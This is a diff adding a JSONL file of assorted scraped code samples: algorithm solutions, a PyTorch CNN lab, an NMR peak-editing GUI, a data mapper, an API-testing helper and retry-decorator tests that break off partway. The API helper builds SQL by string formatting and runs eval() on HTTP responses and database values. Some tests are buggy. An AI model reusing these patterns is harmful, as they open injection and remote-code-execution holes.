diff --git "a/3432.jsonl" "b/3432.jsonl" new file mode 100644--- /dev/null +++ "b/3432.jsonl" @@ -0,0 +1,712 @@ +{"seq_id":"383392476","text":"from lintcode import (\n TreeNode,\n)\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: True if this Binary tree is Balanced, or false.\n \"\"\"\n def is_balanced(self, root):\n # write your code here\n is_balanced, hight = self.dfs(root)\n return is_balanced\n\n def dfs(self, root):\n #is_balanced, hight \n if not root:\n return True, 0\n\n left_balanced, left_h = self.dfs(root.left)\n right_balanced, right_h = self.dfs(root.right)\n\n is_balanced = left_balanced and right_balanced and abs(left_h - right_h) <= 1 \n\n hight = max(left_h, right_h) + 1 \n\n return is_balanced, hight\n\n","sub_path":"4Binary Tree - Divide Conquer & Traverse/93. Balanced Binary Tree.py","file_name":"93. Balanced Binary Tree.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268764144","text":"import torch\nimport time\nimport datetime\nimport os\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\n\nimport torchvision\n\n\nSUB_DIR_PICS = \"fashion\"\nDRAW_MAIN_PICTURE = True\nDOWNLOAD_DATASETS = True\nPRINT_PIC = True\nTEACH = True\n# TEACH = False\nPRINT_ALL_PICS = True\n# PRINT_ALL_PICS = False\n\n\n# lr: [0.001, 0.01, 0.1, 1]\n# bs: [1, 32, 128, 256]\n# e: [1, 5, 20]\n\n# bad\nLEARNING_RATE = 0.1\nBATCH_SIZE = 128\nEPOCH = 20\n\n\n# LEARNING_RATE = 0.1\n# BATCH_SIZE = 128\n# EPOCH = 20\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = torch.nn.Conv2d(in_channels=1, out_channels=6, kernel_size=(5, 5), padding=2)\n self.pool1 = torch.nn.MaxPool2d(kernel_size=(2, 2), stride=2)\n self.conv2 = torch.nn.Conv2d(in_channels=6, out_channels=16, kernel_size=(5, 5))\n self.pool2 = torch.nn.MaxPool2d(kernel_size=(2, 2), stride=2)\n\n self.fc1 = torch.nn.Linear(in_features=16 * 5 * 5, out_features=120)\n self.act1 = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(in_features=120, out_features=84)\n self.act2 = torch.nn.ReLU()\n self.fc3 = torch.nn.Linear(in_features=84, out_features=10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.pool2(x)\n x = x.view(-1, self.num_flat_features(x))\n\n x = self.fc1(x)\n x = self.act1(x)\n x = self.fc2(x)\n x = self.act2(x)\n x = self.fc3(x)\n return torch.nn.functional.softmax(x, dim=1)\n\n def num_flat_features(self, x):\n size = x.size()[1:]\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\nnet = Net()\n\nloss_function = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(net.parameters(), lr=LEARNING_RATE)\n\ntrain_MNIST = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('./', train=True, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, shuffle=True)\n\ntest_MNIST = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('./', train=False, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, 
shuffle=True)\n\ntrain_FashionMNIST = torch.utils.data.DataLoader(\n torchvision.datasets.FashionMNIST('./', train=True, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, shuffle=True)\n\ntest_FashionMNIST = torch.utils.data.DataLoader(\n torchvision.datasets.FashionMNIST('./', train=False, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, shuffle=True)\n\n\ndef train():\n net.train()\n for X_batch, y_batch in train_FashionMNIST:\n optimizer.zero_grad()\n y_pred = net(X_batch)\n loss_value = loss_function(y_pred, y_batch)\n loss_value.backward()\n optimizer.step()\n\n\ndef test():\n correct = 0\n net.eval()\n with torch.no_grad():\n for X_batch, y_batch in test_FashionMNIST:\n y_pred = net(X_batch)\n pred = y_pred.data.max(1, keepdim=True)[1]\n correct += pred.eq(y_batch.data.view_as(pred)).sum()\n return correct / len(test_FashionMNIST.dataset)\n\n\ndef testWithSafe(X_batch_el):\n net.eval()\n y_pred = 0\n with torch.no_grad():\n y_pred = net(X_batch_el.unsqueeze(0))\n return y_pred[0]\n\n\nif TEACH:\n print('Start', flush=True)\n print(datetime.datetime.now(), flush=True)\n print(f'Learning rate: {LEARNING_RATE}', flush=True)\n print(f'Batch size: {BATCH_SIZE}', flush=True)\n print(f'Total epoch: {EPOCH}', flush=True)\n start_time = time.time()\n printedTime = False\n for epoch in range(EPOCH):\n train()\n epoch_res = test()\n if not printedTime:\n avg = time.time() - start_time\n spent_on_epoch = \"%0.0f\" % avg\n until_end = (avg * (EPOCH - 1))\n print(f'Avg seconds spent on each epoch: {spent_on_epoch} sec', flush=True)\n print(f'Until the end: {\"%0.0f\" % (until_end // 60)} min, {\"%0.0f\" % (until_end % 60)} sec', flush=True)\n printedTime = True\n print(f'accuracy on {epoch + 1}/{EPOCH} epoch: {epoch_res.item()}', flush=True)\n\nmatrix = [[0 for j in range(10)] for i in range(10)]\nmatrixPics = [[None for j in range(10)] for i in range(10)]\nif PRINT_PIC:\n os.chdir(os.path.dirname(__file__))\n workingDirectory = os.getcwd()\n pictureFolder = os.path.join(workingDirectory, f'results/pictures/{SUB_DIR_PICS}')\n ind = 0\n\n net.eval()\n with torch.no_grad():\n for X_batch, y_batch in test_FashionMNIST:\n y_pred = net(X_batch)\n pred = y_pred.data.max(1, keepdim=True)[1]\n for j in range(len(X_batch)):\n x_batch_el = X_batch[j]\n y_real = y_batch.data.view_as(pred)[j].item()\n y_predicted = y_pred.data.max(1, keepdim=True)[1][j].item()\n matrix[y_real][y_predicted] += 1\n\n if matrix[y_real][y_predicted] == 1:\n matrixPics[y_real][y_predicted] = X_batch[j][0]\n\n if PRINT_ALL_PICS:\n if y_real != y_predicted:\n pictureFolderByReal = os.path.join(pictureFolder, f'{y_real}')\n if not os.path.exists(pictureFolderByReal):\n os.makedirs(pictureFolderByReal)\n pic_location = os.path.join(pictureFolderByReal, f'{y_predicted}_pred_|_i{ind}.png')\n plt.imshow(x_batch_el[0], cmap='gray')\n plt.title(f'real {y_real}, predicted {y_predicted}')\n print(f'Saving {pic_location}', flush=True)\n plt.savefig(pic_location)\n ind += 1\n print('Matrix:')\n print(np.array(matrix))\n\nif DRAW_MAIN_PICTURE:\n plt.figure()\n for i in range(10):\n for j in range(10):\n plt.subplot(len(matrixPics), len(matrixPics), i * 10 + j + 1)\n if matrixPics[i][j] is not None:\n plt.imshow(matrixPics[i][j], cmap='gray')\n 
plt.xticks([])\n plt.yticks([])\n os.chdir(os.path.dirname(__file__))\n workingDirectory = os.getcwd()\n pictureDir = os.path.join(workingDirectory, f'results/pictures/{SUB_DIR_PICS}.png')\n print(f'Saving global picture {pictureDir}', flush=True)\n plt.savefig(pictureDir)\n","sub_path":"labs/cnn/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"289897116","text":"\n\"\"\"\n======================COPYRIGHT/LICENSE START==========================\n\nEditPeak.py: Part of the CcpNmr Analysis program\n\nCopyright (C) 2003-2010 Wayne Boucher and Tim Stevens (University of Cambridge)\n\n=======================================================================\n\nThe CCPN license can be found in ../../../../license/CCPN.license.\n\n======================COPYRIGHT/LICENSE END============================\n\nfor further information, please contact :\n\n- CCPN website (http://www.ccpn.ac.uk/)\n\n- email: ccpn@bioc.cam.ac.uk\n\n- contact the authors: wb104@bioc.cam.ac.uk, tjs23@cam.ac.uk\n=======================================================================\n\nIf you are using this software for academic purposes, we suggest\nquoting the following references:\n\n===========================REFERENCE START=============================\nR. Fogh, J. Ionides, E. Ulrich, W. Boucher, W. Vranken, J.P. Linge, M.\nHabeck, W. Rieping, T.N. Bhat, J. Westbrook, K. Henrick, G. Gilliland,\nH. Berman, J. Thornton, M. Nilges, J. Markley and E. Laue (2002). The\nCCPN project: An interim report on a data model for the NMR community\n(Progress report). Nature Struct. Biol. 9, 416-418.\n\nWim F. Vranken, Wayne Boucher, Tim J. Stevens, Rasmus\nH. Fogh, Anne Pajon, Miguel Llinas, Eldon L. Ulrich, John L. Markley, John\nIonides and Ernest D. Laue (2005). The CCPN Data Model for NMR Spectroscopy:\nDevelopment of a Software Pipeline. Proteins 59, 687 - 696.\n\n===========================REFERENCE END===============================\n\n\"\"\"\nfrom memops.general import Implementation\n\nfrom memops.gui.Button import Button\nfrom memops.gui.ButtonList import UtilityButtonList\nfrom memops.gui.Entry import Entry\nfrom memops.gui.FloatEntry import FloatEntry\nfrom memops.gui.Frame import Frame\nfrom memops.gui.Label import Label\nfrom memops.gui.PulldownList import PulldownList\nfrom memops.gui.Text import Text\n\nfrom ccpnmr.analysis.popups.BasePopup import BasePopup\nfrom ccpnmr.analysis.core.ExperimentBasic import getPrimaryDataDimRef\nfrom ccpnmr.analysis.core.PeakBasic import pickPeak, movePeak, setManualPeakIntensity\nfrom ccpnmr.analysis.core.UnitConverter import pnt2ppm, unit_converter\n\nclass EditPeakPopup(BasePopup):\n \"\"\"\n **Edit Position, Intensity & Details for a Peak**\n \n This popup window provides a means of editing peak information as an\n alternative to editing values in the main peak tables. This popup is also used\n to specify parameters for when a new peak is explicitly added to a peak list\n using a tabular display.\n\n The user can specify the position of the peak's dimensions in ppm, Hz or data\n point units. Also, the user can adjust the height and volume peak intensity\n values and a textual \"Details\" field, which can carry the user's comments\n about the peak.\n\n When editing an existing peak, no changes are made to the peak until the\n [Update] button is pressed. Likewise for a new peak the [Add Peak] button\n commits the changes. 
If the popup window is closed before the changes are \n committed, then the entire editing or peak addition operation is cancelled.\n\n \"\"\"\n def __init__(self, parent, peak=None, peakList=None, *args, **kw):\n\n self.titleColor = '#000080'\n self.numDims = 0\n self.peak = peak\n \n kw['borderwidth'] = 6\n BasePopup.__init__(self, parent=parent, title='Edit Peak', **kw)\n\n self.registerNotify(self.deletedPeak, 'ccp.nmr.Nmr.Peak', 'delete')\n\n for func in ('setAnnotation','setDetails','setFigOfMerit'):\n self.registerNotify(self.updatePeak, 'ccp.nmr.Nmr.Peak', func)\n for func in ('setAnnotation','setPosition','setNumAliasing'):\n self.registerNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakDim', func)\n for func in ('__init__','delete','setValue'):\n self.registerNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakIntensity', func)\n\n self.dimensionLabels =[]\n self.dimensionEntries=[]\n self.update(self.peak, peakList)\n\n def body(self, guiParent):\n\n self.geometry(\"+150+150\")\n \n guiParent.grid_columnconfigure(0, weight=1)\n self.master_frame = guiParent\n \n units = ('ppm','point','Hz')\n \n self.unit = 'ppm'\n \n self.specLabel = Label(guiParent, fg=self.titleColor, grid=(0,0), sticky='ew')\n \n self.peakLabel = Label(guiParent, grid=(0,1), sticky='ew')\n \n self.unit_frame = frame = Frame(guiParent, grid=(1,1), gridSpan=(1,2))\n\n self.unitLabel = Label(frame, text='Current units: ', grid=(0,0))\n tipText = 'Selects which unit of measurement to display peak dimension positions with'\n self.unitSelect = PulldownList(frame, callback=self.changeUnit,\n texts=units, grid=(0,1), tipText=tipText)\n \n self.heightLabel = Label(guiParent, text='Height',\n borderwidth=2, relief='groove')\n tipText = 'Sets the peak height; the value of the spectrum point intensity (albeit often interpolated)'\n self.heightEntry = FloatEntry(guiParent, borderwidth=1, tipText=tipText)\n self.volumeLabel = Label(guiParent, text='Volume',\n borderwidth=2, relief='groove')\n tipText = 'Sets the peak volume integral; normally a summation of data point values'\n self.volumeEntry = FloatEntry(guiParent, borderwidth=1, tipText=tipText)\n self.detailLabel = Label(guiParent, text='Details',\n borderwidth=2, relief='groove')\n tipText = 'A user-configurable textual comment for the peak, which appears in tables and occasionally on spectrum displays'\n self.detailEntry = Entry(guiParent, borderwidth=1, tipText=tipText)\n\n tipTexts = ['Commits the specified values to update the peak and closes the popup',]\n texts = [ 'Update' ]\n commands = [ self.commit ]\n self.buttons = UtilityButtonList(guiParent, texts=texts, commands=commands, \n doClone=False, helpUrl=self.help_url,\n tipTexts=tipTexts)\n def open(self):\n \n self.updatePeak()\n BasePopup.open(self)\n \n\n def updatePeak(self, object=None):\n \n peak = None\n if object:\n if object.className == 'Peak':\n peak = object\n elif object.className == 'PeakDim':\n peak = object.peak\n elif object.className == 'PeakIntensity':\n peak = object.peak\n \n if (peak is None) or (peak is self.peak):\n self.update(peak=self.peak)\n \n def update(self, peak = None, peakList = None):\n\n # first destroy old labels and entries (saves grid hassles)\n\n for label in self.dimensionLabels:\n label.destroy()\n for entry in self.dimensionEntries:\n entry.destroy()\n\n # now setup required data\n\n if peak:\n title = 'Edit Peak'\n self.buttons.buttons[0].config(text='Update')\n else:\n title = 'Add Peak'\n self.buttons.buttons[0].config(text='Add Peak')\n\n self.setTitle(title)\n\n self.peak = 
peak\n self.peakList = peakList\n if not peakList:\n if peak:\n self.peakList = peak.peakList\n else:\n return\n\n peakList = self.peakList\n spectrum = peakList.dataSource.name\n self.numDims = peakList.dataSource.numDim\n self.posn = self.numDims * [0]\n self.dataDims = peakList.dataSource.sortedDataDims()\n\n if self.peak:\n \n serial = self.peak.serial\n dims = self.peak.sortedPeakDims()\n details = self.peak.details\n if not details:\n details = ''\n if self.peak.annotation:\n annotn = '%0.16s' % self.peak.annotation\n else:\n annotn = ''\n \n heightIntensity = self.peak.findFirstPeakIntensity(intensityType='height')\n volumeIntensity = self.peak.findFirstPeakIntensity(intensityType='volume')\n\n if heightIntensity:\n height = heightIntensity.value\n else:\n height = 0.0\n \n if volumeIntensity:\n volume = volumeIntensity.value\n else:\n volume = 0.0\n\t\n for i in range(self.numDims):\n peakDim = dims[i]\n dataDimRef = peakDim.dataDimRef\n if dataDimRef:\n self.posn[i] = peakDim.position + (peakDim.numAliasing*dataDimRef.dataDim.numPointsOrig)\n else:\n self.posn[i] = peakDim.position\n\n \n else:\n \n dict = peakList.__dict__.get('serialDict')\n if dict is None:\n serial = 1\n else:\n serial = dict.get('peaks',0) + 1\n \n height = 0.0 \n volume = 0.0\n details = ''\n annotn = ''\n\n self.specLabel.set(text='Experiment: %s Spectrum: %s PeakList: %d' % (peakList.dataSource.experiment.name,spectrum,peakList.serial))\n self.peakLabel.set(text='Peak: %d' % serial)\n \n self.dimensionLabels =self.numDims*['']\n self.dimensionEntries=self.numDims*['']\n for i in range(self.numDims):\n pos = self.posn[i]\n if self.unit != 'point':\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n pos = unit_converter[('point', self.unit)]( pos, getPrimaryDataDimRef(dataDim) )\n self.dimensionLabels[i] = Label(self.master_frame, text='F%d' % (i+1), borderwidth=2, relief='groove')\n tipText = 'The peak position in dimension %d, in the specified units' % (i+1)\n self.dimensionEntries[i] = FloatEntry(self.master_frame, borderwidth=1,\n text='%8.4f' % pos, tipText=tipText)\n\n self.heightEntry.set(text='%f' % height)\n self.volumeEntry.set(text='%f' % volume)\n self.detailEntry.set(text=details)\n\n row = 0\n self.specLabel.grid(row = row, column = 0, columnspan=2, sticky='nsew')\n \n row = row + 1\n self.peakLabel.grid(row = row, column = 0, sticky='nsew')\n self.unit_frame.grid(row = row, column = 1, columnspan=2, sticky='nsew')\n\n for i in range(self.numDims):\n row = row + 1\n self.dimensionLabels[i].grid(row = row, column = 0, sticky='nsew')\n self.dimensionEntries[i].grid(row = row, column = 1, columnspan=3, sticky='e')\n \n row = row + 1\n self.heightLabel.grid(row = row, column = 0, sticky='nsew')\n self.heightEntry.grid(row = row, column = 1, columnspan=3, sticky='e')\n\n row = row + 1\n self.volumeLabel.grid(row = row, column = 0, sticky='nsew')\n self.volumeEntry.grid(row = row, column = 1, columnspan=3, sticky='e')\n\n row = row + 1\n self.detailLabel.grid(row = row, column = 0, sticky='nsew')\n self.detailEntry.grid(row = row, column = 1, columnspan=3, sticky='e')\n \n row = row + 1\n self.buttons.grid(row = row, column = 0, columnspan = 4, sticky='nsew')\n\n def changeUnit(self, unit):\n \n posDisp = self.numDims*[None]\n for i in range(self.numDims):\n posDisp[i] = float(self.dimensionEntries[i].get() )\n if self.unit != 'point':\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n posDisp[i] = 
unit_converter[(self.unit,'point')](posDisp[i],getPrimaryDataDimRef(dataDim))\n \n self.unit = unit\n if self.unit != 'point':\n for i in range(self.numDims):\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n posDisp[i] = unit_converter[('point',self.unit)](posDisp[i], getPrimaryDataDimRef(dataDim) )\n \n for i in range(self.numDims):\n value = posDisp[i]\n if value is None:\n self.dimensionEntries[i].set('None') \n else:\n self.dimensionEntries[i].set('%8.4f' % posDisp[i]) \n\n def commit(self):\n \n posDisp = self.numDims * [0]\n \n for i in range(self.numDims):\n posDisp[i] = float(self.dimensionEntries[i].get() )\n if self.unit != 'point':\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n self.posn[i] = unit_converter[(self.unit,'point')]( posDisp[i], getPrimaryDataDimRef(dataDim) )\n \n else:\n self.posn[i] = posDisp[i]\n \n if self.peak:\n movePeak(self.peak,self.posn)\n else:\n self.peak = pickPeak(self.peakList, self.posn)\n \n height = self.heightEntry.get()\n volume = self.volumeEntry.get()\n setManualPeakIntensity(self.peak, height, intensityType='height')\n setManualPeakIntensity(self.peak, volume, intensityType='volume')\n \n details = self.detailEntry.get() or None\n \n self.peak.setDetails( details )\n\n self.close()\n \n def deletedPeak(self, peak):\n\n if self.peak is peak:\n self.close()\n\n def destroy(self):\n\n self.unregisterNotify(self.deletedPeak, 'ccp.nmr.Nmr.Peak', 'delete')\n\n for func in ('setAnnotation','setDetails','setFigOfMerit'):\n self.unregisterNotify(self.updatePeak, 'ccp.nmr.Nmr.Peak', func)\n for func in ('setAnnotation','setPosition','setNumAliasing'):\n self.unregisterNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakDim', func)\n for func in ('__init__','delete','setValue'):\n self.unregisterNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakIntensity', func)\n\n BasePopup.destroy(self)\n","sub_path":"ccpnmr2.4/python/ccpnmr/analysis/popups/EditPeak.py","file_name":"EditPeak.py","file_ext":"py","file_size_in_byte":12831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"31692834","text":"#Get/Create data files\ninput_data = open(\"pitches.csv\", \"r\") #Opens the raw pitch data\noutput_data = open(\"1.txt\", \"w\") #Writes mapped data to 1.txt\n\n#Iterates through the data, mapping the key pitch speed (end_speed) to the value play result (type)\nfor line in input_data:\n datalist = line.strip().split(\",\")\n px,pz,start_speed,end_speed,spin_rate,spin_dir,break_angle,break_length,break_y,ax,ay,az,sz_bot,sz_top,type_confidence,vx0,vy0,vz0,x,x0,y,y0,z0,pfx_x,pfx_z,nasty,zone,code,type,pitch_type,event_num,b_score,ab_id,b_count,s_count,outs,pitch_num,on_1b,on_2b,on_3b = datalist\n #Remove holes in data\n if(pitch_type == '' or start_speed == ''): continue\n output_data.write(pitch_type + \"\\t\" + end_speed + \"\\n\")\n\n#Close the data files \ninput_data.close()\noutput_data.close()\nprint(\"Mapper Complete\")\n","sub_path":"curtis/1Mapper.py","file_name":"1Mapper.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"2643746","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\n# Author: Mr. Li\n# File name: sql_parameter.py\n# Description: \n# Created: 2019/5/18 14:59\n'''\nimport time, logging, sys, json, requests\nfrom datetime import datetime\nfrom lib.signtype import user_sign_api, encryptAES\nfrom common.connectMySql import SqL\nfrom lib.public import validators_result, get_extract, get_param, 
replace_var, extract_variables, call_interface, format_url\n\ns = requests.session()\nextract_dict = {}\nstep_json = []\nlog = logging.getLogger('log')\nsql = SqL()\n\n\n# Get the signature type\ndef get_sign(prj_id):\n \"\"\"\n sign_type: signature type\n \"\"\"\n sign_type = sql.execute_sql('select bp.sign_id from base_project as bp where bp.prj_id = \"{}\";'.format(prj_id),\n num=1)\n return sign_type\n\n\n# Get the test environment\ndef get_env(env_id):\n env = sql.execute_sql(\n 'select be.project_id, be.url, be.private_key from base_environment as be where be.env_id=\"{}\";'.format(env_id),\n dict_type=True, num=1)\n return env['project_id'], env['url'], env['private_key']\n\n\ndef test_case(case_id, env_id, case_id_list, sign_type, private_key, env_url, begin_time=0, locust=False):\n \"\"\"Interface test case\"\"\"\n case = sql.execute_sql(\n 'select bs.case_name, bs.content from base_case as bs where bs.case_id = \"{}\";'.format(case_id), dict_type=True)\n step_list = eval(case['content'])\n case_run = {\"case_id\": case_id, \"case_name\": case['case_name']}\n case_step_list = []\n for ste in step_list:\n if not locust:\n step_info = step(ste, sign_type=sign_type, private_key=private_key, env_url=env_url, begin_time=begin_time,\n locust=locust, env_id=env_id)\n case_step_list.append(step_info)\n if not locust:\n if step_info[\"result\"] == \"fail\":\n case_run[\"result\"] = \"fail\"\n # break\n if step_info[\"result\"] == \"error\":\n case_run[\"result\"] = \"error\"\n # break\n else:\n step_info, url = step(ste, sign_type=sign_type, private_key=private_key, env_url=env_url,\n begin_time=begin_time, locust=locust, env_id=env_id)\n case_step_list.append(step_info)\n if locust:\n return case_step_list, url\n class_name = 'scheduled task'\n func_name = sys._getframe().f_code.co_name\n method_doc = ''\n case_run[\"step_list\"], case_run['class_name'], case_run[\n 'func_name'], case_run['method_doc'] = case_step_list, class_name, func_name, method_doc\n log.info('interface response data: {}'.format(case_run))\n return case_run\n\n\ndef step(step_content, sign_type, private_key, env_url, begin_time=0, locust=False, env_id=''):\n global step_json, extract_dict, s\n if_id = step_content[\"if_id\"]\n interface = sql.execute_sql(\n 'select bi.url, bi.method, bi.data_type, bi.is_sign, bi.is_header from base_interface as bi where bi.if_id = {};'.format(\n if_id), dict_type=True)\n var_list = extract_variables(step_content)\n # Check whether variables exist\n if var_list and not locust:\n for var_name in var_list:\n var_value = get_param(var_name, step_content)\n if var_value is None:\n var_value = get_param(var_name, step_json)\n if var_value is None:\n var_value = extract_dict[var_name]\n step_content = json.loads(replace_var(step_content, var_name, var_value))\n else:\n extract = step_content['extract']\n if_dict = {\"url\": interface['url'], \"header\": step_content[\"header\"], \"body\": step_content[\"body\"]}\n set_headers = sql.execute_sql(\n 'select be.set_headers from base_environment as be where be.env_id=\"{}\";'.format(env_id),\n dict_type=True, num=1)\n headers = set_headers['set_headers']\n make = False\n if set_headers:\n for k, v in eval(headers)['header'].items():\n if k and v:\n if '$' not in v:\n make = True\n if make:\n if_dict['header'] = eval(headers)['header']\n if interface['data_type'] == 'sql':\n for k, v in if_dict['body'].items():\n if 'select' in v:\n if_dict['body'][k] = SqL(job=True).execute_sql(v)\n # Sign the request\n if interface['is_sign']:\n if sign_type == 1: # MD5 encryption\n if_dict[\"body\"] = user_sign_api(if_dict[\"body\"], private_key)\n elif sign_type == 2: 
# No signing\n pass\n elif sign_type == 3: # User authentication\n pass\n elif sign_type == 4: # AES encryption\n if_dict[\"body\"] = encryptAES(json.dumps(if_dict['body']).encode('utf-8'),\n private_key.encode('utf-8')).decode('utf-8')\n else:\n if 'true' in step_content['body']:\n if_dict[\"body\"] = True\n elif 'false' in step_content['body']:\n if_dict['body'] = False\n if '[' in json.dumps(if_dict[\"body\"]): # Case where a body parameter is a list\n for k, v in if_dict['body'].items():\n if_dict[\"body\"][k] = eval(v)\n if not locust:\n if_dict[\"url\"] = env_url + interface['url']\n else:\n if_dict[\"url\"] = interface['url']\n if_dict[\"if_id\"] = if_id\n if_dict[\"url\"], if_dict[\"body\"] = format_url(if_dict[\"url\"], if_dict[\"body\"])\n if_dict[\"if_name\"] = step_content[\"if_name\"]\n if_dict[\"method\"] = interface['method']\n if_dict[\"data_type\"] = interface['data_type']\n if_dict[\"is_sign\"] = interface['is_sign']\n if_dict[\"sign_type\"] = sign_type\n if locust:\n if_dict['extract'] = extract\n return if_dict, env_url\n try:\n\n if interface['is_sign']:\n if sign_type == 4:\n res = call_interface(s, if_dict[\"method\"], if_dict[\"url\"], if_dict[\"header\"],\n {'data': if_dict[\"body\"]}, if_dict[\"data_type\"])\n else:\n res = call_interface(s, if_dict[\"method\"], if_dict[\"url\"], if_dict[\"header\"],\n if_dict[\"body\"], if_dict[\"data_type\"])\n if_dict[\"res_status_code\"] = res.status_code\n # if_dict[\"res_content\"] = res.text\n if_dict[\"res_content\"] = eval(\n res.text.replace('false', 'False').replace('null', 'None').replace('true', 'True')) # Avoids decoding errors when viewing the report\n if interface['is_header']: # Fill in variables from the default headers\n if headers:\n for k, v in eval(headers)['header'].items():\n if k == 'token':\n eval(headers)['header'][k] = if_dict[\"res_content\"]['data']\n now_time = datetime.now()\n sql.execute_sql('update base_environment as be set be.env_id = {}, update_time = {};'.format(env_id, now_time))\n except requests.RequestException as e:\n if_dict[\"result\"] = \"Error\"\n if_dict[\"msg\"] = str(e)\n return if_dict\n if step_content[\"extract\"]:\n extract_dict = get_extract(step_content[\"extract\"], if_dict[\"res_content\"])\n if step_content[\"validators\"]:\n if_dict[\"result\"], if_dict[\"msg\"], if_dict['checkpoint'] = validators_result(step_content[\"validators\"],\n if_dict[\"res_content\"])\n if 'fail' in if_dict['result']:\n if_dict['result'] = 'fail'\n else:\n if_dict['result'] = 'pass'\n else:\n if_dict[\"result\"] = \"pass\"\n if_dict[\"msg\"] = {}\n end_time = time.time()\n interface_totalTime = str(end_time - begin_time) + 's'\n if_dict['interface_totalTime'] = interface_totalTime\n return if_dict\n\n\ndef get_parameters():\n \"\"\"\n Processes locust run parameters\n :return: if_dict interface request parameters\n url request address\n \"\"\"\n plan = sql.execute_sql(\n 'select bp.environment_id, bp.content,bp.plan_name,bp.plan_id from base_plan as bp where bp.is_locust = 1',\n dict_type=True)\n if plan != None:\n env_id = plan['environment_id']\n case_id_list = eval(plan['content'])\n prj_id, env_url, private_key = get_env(env_id)\n sign_type = get_sign(prj_id)\n if_dict_list = []\n for case_id in case_id_list:\n if_dict, url = test_case(case_id, env_id, case_id_list, sign_type, private_key, env_url, locust=True)\n if_dict_list.append(if_dict)\n return if_dict_list, url\n else:\n log.error('Performance test data query returned empty!')\n return False\n\n\nif __name__ == '__main__':\n 
get_parameters()\n","sub_path":"lib/sql_parameter.py","file_name":"sql_parameter.py","file_ext":"py","file_size_in_byte":8616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"106070199","text":"import itertools\nnumbers = [1, 2, 3, 7, 7, 9, 10]\nresult = [seq for i in range(len(numbers), 0, -1) for seq in itertools.combinations(numbers, i) if sum(seq) == 10]\nprint(result)\n\n\ndef subset_sum(numbers, target, partial=[], partial_sum=0):\n if partial_sum == target:\n yield partial\n if partial_sum >= target:\n return\n for i, n in enumerate(numbers):\n remaining = numbers[i + 1:]\n yield from subset_sum(remaining, target, partial + [n], partial_sum + n)\nls_input = [124, 74]\ntotal = 500\nlist(subset_sum(ls_input, total))","sub_path":"study/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293269849","text":"import itertools\nimport math\n\nif __name__ == '__main__':\n l, r = map(int, input().split())\n margin = r - l\n loop = 2019\n if margin < 2019:\n loop = margin\n\n ans = float('inf')\n for i in range(loop):\n for j in range(i + 1, loop+1):\n if l + j <= r:\n ans = min(ans, (l + i) * (l + j) % 2019)\n print(ans)","sub_path":"procon-archive/atcoder.jp/abc133/abc133_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"420427525","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport pytest\nfrom ..utils import retry\n\n\n@pytest.fixture\ndef _conut():\n return 1\n\n\nclass RetryableError(Exception):\n pass\n\n\nclass AnotherRetryableError(Exception):\n pass\n\n\nclass UnexpectedError(Exception):\n pass\n\n\ndef test_no_retry_required():\n counter = 0\n\n @retry(RetryableError, tries=4, delay=0.1)\n def succeeds(counter):\n counter += 1\n return [counter, 'success']\n\n r_counter, r_result = succeeds(counter)\n\n assert r_result == 'success'\n assert r_counter == 1\n\n\ndef test_retries_once():\n counter = 0\n\n @retry(RetryableError, tries=4, delay=0.1)\n def fails_once(counter):\n counter += 1\n if counter < 2:\n raise RetryableError('failed')\n else:\n return [counter, 'success']\n\n r_counter, r_result = fails_once(counter)\n assert r_counter == 2\n assert r_result == 'succcess'\n\n\ndef test_limit_is_reached():\n global counter\n counter = 0\n\n @retry(RetryableError, tries=4, delay=0.1)\n def always_fails():\n global counter\n 